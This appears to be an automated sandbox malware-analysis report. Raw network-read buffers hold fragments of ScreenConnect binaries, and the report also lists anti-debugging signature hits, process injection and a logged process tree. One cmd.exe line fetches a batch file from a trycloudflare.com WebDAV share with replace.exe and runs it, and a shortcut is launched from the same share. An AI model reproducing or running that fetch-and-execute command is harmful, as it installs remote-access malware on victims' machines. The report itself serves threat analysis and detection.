 buffer: `€ €X€l€p€"€ˆ€Þ€ €¬€¸€Ä€Ð€è€ 0@ PØchäØË \äØ'$¬äØÓ%ã.äð¶TäðÌTˆäFILESZSCREENCONNECT.CORE, VERSION=25.1.10.9197, CULTURE=NEUTRAL, PUBLICKEYTOKEN=4B14C015C87C1AD8]SCREENCONNECT.WINDOWS, VERSION=25.1.10.9197, CULTURE=NEUTRAL, PUBLICKEYTOKEN=4B14C015C87C1AD8fSCREENCONNECT.WINDOWSINSTALLER, VERSION=25.1.10.9197, CULTURE=NEUTRAL, PUBLICKEYTOKEN=4B14C015C87C1AD8 _ENTRYPOINT _RESOLVERMZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL™à" 0`Ö{ € À±p@…{O€€  äz8  H.textè_ ` `.rsrc€€b@@.reloc  f@Bµ{HXD 6 dz€{: *{; *V(< }: }; *0Au .4,/(= {: {: o> ,(? {; {; o@ ***Ò ë¨ )UU¥Z(= {: oA X )UU¥Z(? {; oB X*0brp %{: %q„Œ„-&+ þ„oC ¢%{; %q…Œ…-&+ þ…oC ¢(D *{E *{F *V(< }E }F *0Au† .4,/(= {E {E o> ,(? {F {F o@ ***Ò F•b# )UU¥Z(= {E oA X )UU¥Z(? {F oB X*0br?
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: 2160000030 60000200 TempAdmin-{0}+uÀãçÍÇðîÅUÖF¨Ì dÂf5Ýî蚕ʙ4a™Ô8­L„k5Öe×ë?åÃ'Qlåá}M e,í<(ÈÐÒ ñY˜JÐô–;¬ r™ëûÎOÖõ” ¾5o´9cáä\²ë(ç’ÈQªÒ%.‹©AŒ˜xø-떂)CXÛÓôe{]RSDSHD#_ßM½oDÒ_Ÿü‘C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb©{Ã{ µ{_CorDllMainmscoree.dllÿ%   !""##$%%&&'(())**+,,--.//00122334556677899::;<<==>??@@AABCCDDEFFGGHIIJJKLLMMNNOPPQQRSSTTUVVWWXXYZZ[[\]]^^_``aabccddeefgghhijjkklmmnnoppqqrrsttuuvwwxxyzz{{||}~~€‚‚ƒ„„……†‡‡ˆˆ‰‰Š‹‹ŒŒŽŽ‘‘’’“””••––   !!!""""###$$$%%%&&&&'''(((()))***+++,,,,---....///000111222233344445556667778888999::::;;;<<<===>>>>???@@@@AAABBBCCCDDDDEEEFFFFGGGHHHIIIJJJJKKKLLLL3f™Ìÿ€0€HX€""4VS_VERSION_INFO½ïþí# í# ?DVarFileInfo$Translation°‚StringFileInfo^000004b0NCompanyNameScreenConnect Software,FileDescription : FileVersion25.1.10.9197NInternalNameScreenConnect.Core.dll(LegalCopyright VOriginalFilenameScreenConnect.Core.dll<ProductNameScreenConnect> ProductVersion25.1.10.9197B Assembly Version25.1.10.9197p Ø;MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL ãݯà" 0TÆs € ÀbG@…ssO€ˆ  Ðr8  H.textØS T `.rsrcˆ€V@@.reloc  Z@B§sHø¯( Î0¤Pr€(+ *^(+ Ë%œ}*:(+ }*:(+ }*:(+ }*s, *s- *:(. (/ *{0 *"}0 *J(1 Œ(2 &*:(. (3 *{4 *"}4 *0((5  +£Œ(2 &X Ži2ä*v(. s6 } s7 } *v{ rp(+Œo9 *0.o: +o; (+&o -éÞ ,o Ü*" ‚{ Œo< &Œ(*0L { Œo= -.o> Œ (+&{ Œ(
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: $>,>4><>D>L>T>\>d>l>t>|>Ј88˜8 8¨8°8¸8À8È8Ð8Ø8à8è8ð8ø89999 9(90989@9H9P9X9`9h9p9x9€9ˆ99˜9 9¨9°9¸9À9È9Ð9Ø9à9è9ð9ø9:::: :(:0:8:@:H:P:X:`:h:p:x:€:ˆ::˜: :¨:°:¸:À:È:Ð:Ø:à:è:ð:ø:;;;; ;(;0;8;@;H;P;X;`;h;p;x;€;ˆ;;˜; ;¨;°;¸;À;È;Ð;Ø;à;è;ð;ø;<<<< <(<0<8<@<H<P<X<`<h<p<x<€<ˆ<<˜< <¨<°<¸<À<È<Ð<Ø<à<è<ð<ø<==== =(=0=8=@=H=P=X=`=h=p=x=€=ˆ==˜= =¨=°=¸=À=È=Ð=Ø=à=è=ð=ø=>>>> >(>0>8>@>H>P>X>`>h>p>x>€>ˆ>>˜> >¨>°>¸>À>È>Ð>Ø>à>è>ð>ø>???? ?(?0?8?@?H?P?X?`?h?p?x?€?ˆ??˜? ? 88<8œ8 8¨8 99 9$9,9D9T9X9h9l9p9x99 9¤9´9¸9À9Ø9à<== =<=@=`=h=l=ˆ==”=¤=È=Ô=Ü=>>$>(>0>8>@>D>L>`>h>|>”>˜>Ä>Ð>??(?0?8?D?d?p?¨?Ä?È?è?040(0H0h0ˆ0¨0È0è01(1H1h1ˆ1¨1È1è12(2H2d2h2@x000 00000 0$0(0,0004080<0@0D0H0L0P0T0606@6P6`6p6ˆ6”6˜6œ6¸6¼6x7|7€7„7ˆ7Œ77”7˜7œ7¨7¬7°7´7¸7¼7À7Ä7à899NMZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $ñ#"‡µBLÔµBLÔµBLÔÚ4çÔ¼BLÔÚ4æԁBLÔ¼:ßÔ¶BLÔµBMԋBLÔÚ4ÒÔ½BLÔÚ4âÔ¹BLÔÚ4×Ô´BLÔÚ4ÖÔ´BLÔÚ4ÑÔ´BLÔRichµBLÔPEd†-âPð"  º¢P~€ @°;á„5(€p ˆÐÐ.textˆ¹º `.rdata‘lÐn¾@@.data€!@,@À.pdata p <@@.rsrc€F@@.reloc\J@BHƒìH‹ÁL‹ÚD·ÉHÁèD·ÐAƒøu<¶LÈIùñÿrIéñÿMÑIúñÿ‚IêñÿIÁâM ÑI‹ÂHƒÄÃH…ÒuBHƒÄÃH‰\$AƒøsAE…Àtfff„A¶IÿÃLÈMÑAÿÈuîIùñÿrIéñÿH¸ÍÅ/ áétH»ÍÅ/ áAø°‚0¸¯©n^H‰<$A÷àÁê ‹ú€AÀPêÿÿ¹[@A¶IƒÃLÈA¶CñMÑLÈA¶CòMÑLÈA¶CóMÑLÈA¶CôMÑLÈA¶CõMÑLÈA¶CöMÑLÈA¶C÷MÑLÈA¶CøMÑLÈA¶CùMÑLÈA¶CúMÑLÈA¶CûMÑLÈA¶CüMÑLÈA¶CýMÑLÈA¶CþMÑLÈA¶CÿMÑLÈMÑÿÉ…EÿÿÿH‹ÃI÷áI‹ÁH+ÂHÑèHÂHÁèHiÀñÿL+ÈH‹ÃI÷âI‹ÂH+ÂHÑèHÂHÁèHiÀñÿL+ÐHÿÏ…ìþÿÿH‹<$E…À„AAƒø‚ÕA‹ÈHÁéffffff„A¶AƒÀðIƒÃLÈA¶CñMÑLÈA¶CòMÑLÈA¶CóMÑLÈA¶CôMÑLÈA¶CõMÑLÈA¶CöMÑLÈA¶C÷MÑLÈA¶CøMÑLÈA¶CùMÑLÈA¶CúMÑLÈA¶CûMÑLÈA¶CüMÑLÈA¶CýMÑLÈA¶CþMÑLÈA¶CÿMÑLÈMÑHÿÉ…@ÿÿÿE…Àtfff„A¶IÿÃLÈMÑAÿÈuîH‹ÃI÷áI‹ÁH+ÂHÑèHÂHÁèHiÀñÿL+ÈH‹ÃI÷âI‹ÂH+ÂHÑèHÂHÁèHiÀñÿL+ÐH‹\$IÁâM ÑI‹ÂHƒÄÃÌÌÌÌÌÌÌÌÌÌH…Òu3ÀÃéÌÌÌ@WL‹ÉE‹ØL‹ÒH=>õA÷ÑE…Àt+fDAöÂtA¶ A‹ÁAÁéH3ÈIÿ¶Á‹‡D3ÈAÿËuÛH‰\$Aƒû ‚,A‹ÛHÁëDE3 A‹ÁHÁè¶ÐA‹ÁD‹„—HÁè¶ÈA‹ÁD3„HÁèD3‡A¶ÁD3„‡ E3BE‹ÈA‹ÀHÁè¶ÐA‹ÀD‹„—HÁè¶ÈA‹ÁD3„HÁèD3‡A¶ÁD3„‡ E3BE‹ÈA‹ÀHÁè¶ÐA‹ÀD‹„—HÁè¶ÈA‹ÁD3„HÁèD3‡A¶ÁD3„‡ E3B E‹ÈA‹ÀHÁè¶ÐA‹ÀD‹„—HÁè¶ÈA‹ÁD3„HÁèD3‡A¶ÁD3„‡ E3BE‹ÈA‹ÀHÁè¶ÐA‹ÀD‹„—HÁè¶ÈA‹ÁD3„HÁèD3‡A¶ÁD3„‡ E3BA‹ÀE‹ÈHÁè¶ÐA‹ÀHÁèD‹„—¶ÈA‹ÁD3„HÁèIƒÂ D3‡A¶ÁAƒÃàD3„‡ E3BøE‹ÈA‹ÀHÁè¶ÐA‹ÀD‹„—HÁè¶ÈA‹ÁD3„HÁèD3‡A¶ÁD3„‡ E3BüE‹ÈA‹ÀHÁè¶ÐA‹ÀD‹„—HÁè¶ÈA‹ÁD3„HÁèD3‡A¶ÁD3„‡ HÿËE‹È…àýÿÿAƒûrXA‹ÛHÁëE3 IƒÂAƒÃüA‹ÁHÁè¶ÐA‹ÁD‹„—HÁè¶ÈA‹ÁD3„HÁèD3‡A¶ÁD3„‡ HÿËE‹Èu²H‹\$E…Ût'„A¶ A‹ÁAÁéH3ÈIÿ¶Á‹‡D3ÈAÿËuáA÷ÑA‹Á_ÃÌÌÌÌÌÌÌÌÌ@SUWAUAVHƒì H‹„$€A¾A‹ù‹êH‹ÙE‹îH…À„J€81…Aƒ¼$ˆp…3H…ÉuAþHƒÄ A^A]_][Ã3ÒL‰|$`H‰Q0H9Q@uHÏ]H‰QPH‰A@H‹AHH Ì]H;ÂHDÁƒýÿH‰CH¸DèE…ÉyD‹ê÷ßëAƒù~ A½ƒïD‹|$pL‰d$XAGÿƒø‡¥Aƒø…›Gøƒø‡ƒý ‡†D‹d$xAƒü‡wH‹KPA;ø¸ A¸(A‹ÖH‰t$PDøÿS@H‹ðH…À„DH‰C8D‰h,H‰‰xH‹ÏE3íL‰h0E‹ÎEEAÓáAOD‰HDAAÿ‰Nx‰FLA‹ÆÓàƒÁ‰Ft
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: 1åÄs24;så’ÂÖÆH3½^w!0[ ȘÒfì5‘²‘÷¶àÌ:t1˾òrÁáö~Q›¼iޓÑf6݀‘ý#¾µI¥w¼‘X<M—”Qý®Ù;Ûœz•Û9ëßOü5 Ðl\ù»Z®•„v”Ë>ú8ÿð`m}·]*‰åã&Õ;žksURSDS EìEÑ)þF„à*¿LâòC:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb›sµs §s_CorDllMainmscoree.dllÿ%  ÿþ€0€HX€**4VS_VERSION_INFO½ïþí# í# ?DVarFileInfo$Translation°ŠStringFileInfof000004b0NCompanyNameScreenConnect Software,FileDescription : FileVersion25.1.10.9197TInternalNameScreenConnect.Windows.dll(LegalCopyright \OriginalFilenameScreenConnect.Windows.dll<ProductNameScreenConnect> ProductVersion25.1.10.9197B Assembly Version25.1.10.9197p È3MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELª©ˆà" 0¤zÂ à  sè@…%ÂOà° pÁ8  H.text@£ ¤ `.rsrc°à¦@@.reloc ª@BYÂH¨ÇHù ðÀ€(# *(# *^(# R%œ}*:(# }*:(# }*:(# }*0Ijs €js €js €js €js €*0rS%ÐÃ($ €  S%ÐÀ($ €  S%п($ €  S%о($ € S%ÐÂ($ € *Z}}}*{*"}*{*"}*{*"}*0@s% rpo& &rpo& &(,  o' &}o' &o( *0wr'po& &(  þ o( o& &r?po& &( þ o( o& &rcpo& &( þWo( o& &*.(þ*&(*þ() {o* )UU¥Z(+ {o, X )UU¥Z(- {o. X*^u , ¥ (**0I() {{o/ ,/(+ {{o0 ,(- {{o1 **f( T(T(U*>}}*{*"}*{*"}*0@s% rupo& &rpo& &(!,  o' &}o' &o( *0Br‘po& &( þ o( o& &r­po& &(o2 &*.(#þ*&(&*¢(3 {o4 )UU¥Z(5 {o6 X*^u, ¥(&**Æ(3 {{o7 ,(5 {{o8 **V( (Q*:(9 }*{*¢~Å%-&~Äþ,s: %€Å(+*:(+.(= *F~(/s*2~s*>þs-%}Ê*0qs> s? ”(Z”XÒo@ (+o +o  joB o -éÞ ,o ÜoC Þ,o Ü,o Ü*(+F  MZ ^d 0&o ( 3
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: jXëFWÿs0‹Ëèýøÿÿ‰E…Àu1j3ҍN_‹qüƒþu ‹s0‹òTBë ƒþBu ‹s0ò‰1ƒÁOu׋E_^[]ÂU‹ìQVjEüP‹ñè©øÿÿ…Àu‹Eü;Et¸ãë ÿu ‹Îè0ÿÿÿ^ÉÂU‹ìVWÿu ‹ñÿuèFþÿÿ‹ø…ÿtÿvÆFBÿððƒf‹Ç_^]ÂU‹ìVWÿu ‹ñÿuèþÿÿ‹ø…ÿt ÿvÿüðÆFB‹Ç_^]ÂU‹ìSV‹ñ3Û8^@t¸ÝëL8^Bu‹E‰ë>ÿu ÿuèvÿÿÿ;Ãu19]t‹M¸`;Ët‰Pÿu‹Îè ÿÿÿëÿvÿðð‰^ˆ^B3À^[] U‹ìƒìH¡ 3ʼnEüVW‹ñèiùÿÿ‹ø…ÿtzÿãurënjE¸P‹ÎèŒ÷ÿÿ…Àu EÜP‹Îè!þÿÿ‹ø…Àt=ãtEƒømt@=èëǍE¼PEÜPÿu¸‹ÎèÞðÿÿƒ}¸t)E¼Pÿu¸‹Îèèþÿÿ‹ø…ÿtƒÿmt ÿèt3ÿ€~BuŠÿvÿðð‹Müƒf‹Ç_3Í^èWÉÃU‹ì‹Mè9ÿÿÿ]ÂU‹ìQSV‹ñ3Û8^@td9^u_SSjS‰]üÿìð‰F;Ãu ÿÜð‰Eüë:‹FW‹=ðð;ÃtPÿ×SSVh¸*SSÿ(ñ‰F;ÃuÿÜðÿv‰Eüÿ׉^_‹Eüë¸Ý^[ÉÃéÿÿÿU‹ìì| ¡ 3ʼnEü‹E S‰…óÿÿ3ÀhÆf‰…4ÿÿÿ3ۍ…6ÿÿÿSPèÞ9ƒÄ ÿ<ñPh°ÿ…4ÿÿÿjdPèž9ƒÄj…4ÿÿÿPÈòÿÿèlõÿÿÈòÿÿè_ûÿÿ;Ãt&Ph ÿÿuècƒÄ Èòÿÿè´úÿÿ¸C鮍ÈòÿÿèÑþÿÿ;ÃtPhþMZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $ÛSŒcŸ2â0Ÿ2â0Ÿ2â0„¯|0‘2â0„¯H0û2â0–Jq0”2â0Ÿ2ã02â0„¯I0¶2â0„¯y0ž2â0„¯x0ž2â0„¯0ž2â0RichŸ2â0PEL9ÊØPà!  ÒH¥iðpò@ÛÅ*lÑx@ÀPd  òàË@ðh.textÜÐÒ `.rdataÕðÖ@@.dataÄ-ì@À.rsrcÀ@ ü@@.relocÞP@BU‹ììL¡ 3ʼnEü‹ES‹] ‰…¼ýÿÿ‹EW‰…¸ýÿÿ‹Eh(ø‰…´ýÿÿÿàð3ÿ‰…Èýÿÿ;ÇuÿÜðPhP÷ÿuèØ+ƒÄ 2ÀéOV‹5Øðh8÷PÿÖh$÷ÿµÈýÿÿ‰…Àýÿÿÿ֋ð9½Àýÿÿ„ù;÷„ñ;ßtSf9;tNjSEÔjPè‰7ƒÄEÔPhðöÿuèk+ƒÄ …ÄýÿÿPhÌòh¼òjWEÔPÿÖ;Ç}XPh˜öé¦WjEÔPWh…ÌýÿÿPWWÿµ¼ýÿÿWÿµ¸ýÿÿÿ•Àýÿÿ;Ç}–Ph0öÿuè+h0ôÿuè÷*ƒÄëd‹…Äýÿÿ‹PÿQ(;Ç}PhØóÿuèÔ*‹…Äýÿÿ‹ƒÄ PÿQë5‹…Äýÿÿ‹´ýÿÿÿµÈýÿÿ‰ÿÔð°ë%ÿÜðPhàòÿuè‘*ƒÄ ÿµÈýÿÿÿÔð2À^‹Mü_3Í[èJ7ÉÂU‹ìQQƒeøSV‹5”ñWÿuÿ֋ø…ÿu»€ë ‹E ‹UøRWPÿ‘°W‹=˜ñ‹ØÿׅÛySÿuhðøé™ÿuƒeüÿ֋؅Ûu ÇE€ë‹Eø‹UüRSPÿQDS‰Eÿ׋Eø‹PÿQƒ}|Sƒ}ütMÿuÿ֋ð…öu»€ëÿu‹Eü‹jVPÿ‘´V‹Øÿ׋Eü‹PÿQ…Ûx ‹Eƒ8t°ë#Sÿuh˜øë ÿuÿuh@øÿuè|)ƒÄ2À_^[ÉÂU‹ìQƒeüSV‹ò3ۅöt#W‹} +ù…Àt·f…Òt f‰ƒÁHCNuè_…öu ƒéKÇEüz€3Àf‰‹E…Àt‰‹Eü^[ÉÂU‹ì‹U 3À…Òtúÿÿÿv¸W€…Àxÿu‹Mj¸þÿÿèzÿÿÿ] U‹ì‹U 3ɅÒtúÿÿÿv¹W€W‹}‹Á…Éx*3ÀV‹ò‹Ï…Òtf9tƒÁNuõ…öu ¸W€3É^ë‹Ê+Îë÷3ɅÀxÿu+Ñj O¸ÿÿÿèÿÿÿ_] U‹ìƒì¡ 3ʼnEü‹E ‹ƒeôƒeøSVWUôRPÿQH‹ð…öx ‹Eô‹UøRh úPÿ‹ð‹Eô‹PÿQ…öyVh8úÿuè(ƒÄ 2Àé‹EPf‹ƒÀf…Éuõ+ÂÑø‹ðD6èÞ4‹ü…ÿu»€ëeh$úƒÆ VWè¿þÿÿÿuVWèèþÿÿ‹5”ñWÿ֋ø…ÿtыEø‹WPÿQW‹=˜ñ‹ØÿׅÛx$ƒ}tÿuÿ֋ð…öt§‹Eø‹VPÿQ(V‹ØÿׅÛySh¸ùÿuèt'‹Eø‹ƒÄ PÿQéHÿÿÿ‹E ‹UðRjÿuøÿuPÿQD‹ð‹Eø‹PÿQ…öxÿu‹Eð‹h¤ùPÿ‹ð‹Eð‹PÿQ…öy VhHùéïþÿÿ°eä_^[‹Mü3ÍèÚ3ÉÂU‹ìƒì ¡ 3ʼnEüVWÿuEàj ÿu ÿ5HPèŽ>ƒÄƒ}àÿtUjjÿuàè¬5‹øƒÄ 3ö…ÿ~5jVÿuàè–5ƒÄ ;Æu#EäPÿuàÿ5Pè„2ƒÄ …Àu$Æ;÷|Ëÿuàè+4YƒÈÿ‹Mü_3Í^è@3ÉÃjVÿuà‰5DèA5‹EàƒÄ ëÙU‹ìƒ}‹E uDÿuPÿuè5ƒÄ +D]ÃU‹ìSVW‹}3öVW3Ûÿäð…ÀuaÿÜð=·tT·‹Ïf…ÀtGfƒø\u‹ñƒÁ·f…Àuí…öt03ÀWf‰è®ÿÿÿ‹Øj\Xf‰…ÛuSWÿäð…ÀuÿÜð=·tƒËÿ_^‹Ã[]ÂU‹ìQQ¡ 3ʼnEüƒ}SVW…ä‹E 3öVVjÿÿpVhéýÿèð‹Ø¡LHf‹ƒÀf;Öuõ+ÁÑøtD6è22‹ü…ÿuƒÈÿé±ÿ5LFPWèüÿÿh°úFPWè5üÿÿCP+ówP‹E jÿÿpjhéýÿèðƒMøÿ·3ö‹Ïf…Àt,fƒø\u‹ñƒÁ·f…Àuí…öt3ÀWf‰è¥þÿÿj\Yf‰…Àuh€j h!EøWPèb<ƒÄ‹Eøëƒ}u‹E ÿpèC23ÀY@ë3Àeì_^[‹Mü3ÍèP1ÉÃU‹ìƒì¡ 3ʼnEüVEðPjhèhèIh†bh“Zh7h¢ThTè<0‹ð3ÀƒÄ$;ðtF‹MPPh”PˆEïEïP‰ H‹M PV‰5P‰ Lèý/ƒÄV…Àt èê/Y3Àë èà/Y‹Eð‹Mü3Í^è°0É‹;Ãr =€vI;ØsE‹…Ét…ÀtÆAHuùÿ6èŸKY¸;Ør‹Ã3ÉjZ‰÷âÁ÷Ù ÈQèýJY‰…
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: ¡D 3ʼnEüSVh@.ÿu3öèΫ‹Ø…ÛyhP.Sè_±YYé,W‹=\…ôýÿÿPVVj0VÿׅÀu…ôýÿÿPht.è~Ǎ…ôýÿÿPVVjVÿׅÀu…ôýÿÿPhœ.è[Ǎ…ôýÿÿPVVj;VÿׅÀu…ôýÿÿPhÄ.è8Ǎ…ôýÿÿPVVj/VÿׅÀu…ôýÿÿPhì.èǍ…ôýÿÿPVVjVÿׅÀu…ôýÿÿPh /èòƍ…ôýÿÿPVVj.VÿׅÀu…ôýÿÿPhT/èÏƍ…ôýÿÿPVVjVÿׅÀu…ôýÿÿPhˆ/è¬Æ…ôýÿÿPVVj5VÿׅÀu…ôýÿÿPh¼/è‰Æ…ôýÿÿPVVj6VÿׅÀu…ôýÿÿPhè/èfƍ…ôýÿÿPVVj7VÿׅÀu…ôýÿÿPh0èCƍ…ôýÿÿPVVj!VÿׅÀu…ôýÿÿPhD0è ƍ…ôýÿÿPVVVVÿׅÀu…ôýÿÿPhd0èþō…ôýÿÿPVVj"VÿׅÀu…ôýÿÿPh„0èÛō…ôýÿÿPVVj VÿׅÀu…ôýÿÿPh¤0è¸Å…ôýÿÿPVVj VÿׅÀu…ôýÿÿPhÔ0è•Å…ôýÿÿPVVj'VÿׅÀu…ôýÿÿPhô0èrō…ôýÿÿPVVjVÿׅÀu…ôýÿÿPh1èOō…ôýÿÿPVVjVÿׅÀu…ôýÿÿPh<1è,ō…ôýÿÿPVVjVÿׅÀu…ôýÿÿPh\1è ō…ôýÿÿPVVjVÿׅÀu…ôýÿÿPh€1èæč…ôýÿÿPVVj(VÿׅÀu…ôýÿÿPh¤1èÃč…ôýÿÿPVVjVÿׅÀu…ôýÿÿPhÄ1è Ä…ôýÿÿPVVj8Vÿ×_…Àu…MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $×¹AF“Ø/“Ø/“Ø/'DÞšØ/'DÜåØ/'DÝ‹Ø/¸,‚Ø/¸+ƒØ/¸*…Ø/š ¬—Ø/š ¼‚Ø/“Ø.nØ/*¹*´Ø/*¹/’Ø/*¹Ð’Ø/“ظ’Ø/*¹-’Ø/Rich“Ø/PELpGYà!  öL& €@ýÀP´Px`€PöT¨ö@<.text+õö `.rdata*ú@@.dataì" þ@À.rsrcxP@@.reloc€` @B¡£H(á£P(á£h(á£T(á £X(áh£L(á£\(á£`(á£d(ÃÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìh,ÿuèąÀyhLPè¬ÉYYëjhèjh€jjhÿÿÿœjèqÃ]ÂU‹ìVhàÿuèÍÃ3ö…ÀyhüPè^ÉYYëVhèjVVjhÿÿÿœVè*Ã^]ÂU‹ìƒì VWh˜ÿu3ÿ‰}ø‰}ô‰}üèvËð…öyh°VèÉYYëDEøPhÈèìԋð…öyhìëۋEø‰EôEüPEôPè:ދð…öyh ë»Wÿuüèã9}ütÿuüèM—9}øtÿuøè@—…öy¿CWèƒÂ_^‹å]ÂU‹ìVWh0ÿu3ÿèØ‹ð…öyhHë?èS΅Àt>h`jè—ÇYYjjÿuèq‡‹ø…ÿ‹÷ë ·÷Î€…öyhŒVè(ÈYY…öy¿CWèÂ_^]ÂU‹ìQQƒeøEøƒeüSVW‹} 3öPÿuF‹_ÿ‹Eø;…‰PhVèÇƒÄ EüPÿw3ÀƒûV”ÀPjÿwÿuÿœ…Àt7ÿuüh(VèßÆƒÄ ƒûu9ƒ}ütEüPÿwVVVjÿuÿœë3öëÿPÿwh4Vè¡ÆƒÄjÿ_‹Æ^[‹å]ÂU‹ìQQSVW3Ûj‰]ü‰]øèh†‹ø…ÿu¾€Vjfh`èz™hpéÊÿu SWèB†‹ð…öt+~ ·öÎ€…öx¾@€Vjih`è?™h”鏍EøPEüPÿu賞‹ð…öx39]øv.Wh2èuڃøu¾B€ëƒøu3öFë ƒøu‹óë…Àu‹Eü…Àt Pèúš‹Ã‰Eü‰]øƒþtë5‹ðë ·ðÎ€…öx¾@€Vjh`諘hÀVèCƋEüYY…ÀtP謚…ÿtWèW…_‹Æ^[‹å]ÂU‹ìQQVÿu3öhLj‰uø‰uüèAÅƒÄ EüPEøPÿuèڝ…ÀxF9uüvAÿuüÿuh`jèŋEüƒÄ…Àtÿu‹Eøÿu ÿ4°è)‹EüF;ðrçÿuPÿuø蕜ƒ}ø^tÿuøèš‹å] U‹ìƒì¡D 3ʼnEüS‹] V‹uWSVhôjè¨Ä3À}ð«ƒÄ««‹E‰EøEðPh*‰uð‰]ôÿ”_^[…Àuÿ…ÀtPh(jèdÄƒÄ ‹Mü3Íèøñ‹å] U‹ìQQÿuƒeøƒeühLjè5ÄƒÄ EüPEøPÿuèΜ…Àx)ƒ}üv#ÿu ÿuüÿuh¤jèăÄÿuüÿu è[ڃ}øtÿuøè ™‹å]ÂU‹ìV3ö9u v1S‹]Wÿ4³jjÿø‹ø…ÿtÿuWÿüWÿF;u rÖ_[^] U‹ìƒì,S3ÛVWhäÿu‰]؋û‰]ø‰]܉]à‰]ä‰]ð‰]è‰]ԉ]ô‰]ü‰]ì脾‹ð…öy hHé¾9]ôtÿuôè6ƒEô‰]ôPÿ5 è“Ö‹ð…öy hüé9]ütÿuü胍Eü‰]üPÿuôè ̅À…-EØPjÿuüè7Ӌð…öˆEàPjÿuüèӋð…öˆï‹Eà…Àtf9tPÿu轂ƒø„t…ÀtŠEøPjÿuüè„Ћð…öˆ®EÜPjÿuüèlЋð…öˆEðPjÿuüè©Ñ‹ð…öˆpEäPjÿuüè<Ћð…öˆQEÔPjÿuüèyыðƒþu‰]ԋó…öˆ(EèPjÿuüèWыðƒþu ÇE舋ó…öˆ‹Eð¨@t.‹E܅Àu¸Pÿuøèaûÿÿ‹ðþB€„O…öˆ±‹Eð¨tÿuèjÿuøèdüÿÿ‹Eð¨tÿuèjÿuøèPüÿÿ‹Eð¨6tLEìPÿuøèfڋð…öˆ„EìPÿuðèºÙ‹ð…öxkEìPÿuèè¨Ù‹ð…öxREìPÿuÔè–Ù‹ð…öx@‹Eä…Àtf9t PÿuøèõüÿÿGéþÿÿÿuؾW€h˜VèîÁƒÄ é–hìé„hë}h\ëvh,ëoh´ëhh|ëahDëZhëShÔëLh`ëEh0ë>°ýþø÷Þö#
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\replace.exe \\hot-browser-luke-granted.trycloudflare.com@SSL\DavWWWRoot\yes.bat C:\Users\test22\Music /A & C:\Users\test22\Music\yes.bat
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:148 CREDAT:145409
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2620 CREDAT:145409
cmdline C:\Windows\System32\replace.exe \\hot-browser-luke-granted.trycloudflare.com@SSL\DavWWWRoot\yes.bat C:\Users\test22\Music /A
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
parent_process iexplore.exe martian_process "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\replace.exe \\hot-browser-luke-granted.trycloudflare.com@SSL\DavWWWRoot\yes.bat C:\Users\test22\Music /A & C:\Users\test22\Music\yes.bat
parent_process iexplore.exe martian_process \\hot-browser-luke-granted.trycloudflare.com\DavWWWRoot\rename.lnk
Process injection Process 2620 resumed a thread in remote process 2776
Process injection Process 2620 resumed a thread in remote process 3040
Process injection Process 148 resumed a thread in remote process 2220
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000000000003c4
suspend_count: 1
process_identifier: 2776
1 0 0

NtResumeThread

 thread_handle: 0x00000000000001b8
suspend_count: 1
process_identifier: 3040
1 0 0

NtResumeThread

 thread_handle: 0x00000338
suspend_count: 1
process_identifier: 2220
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe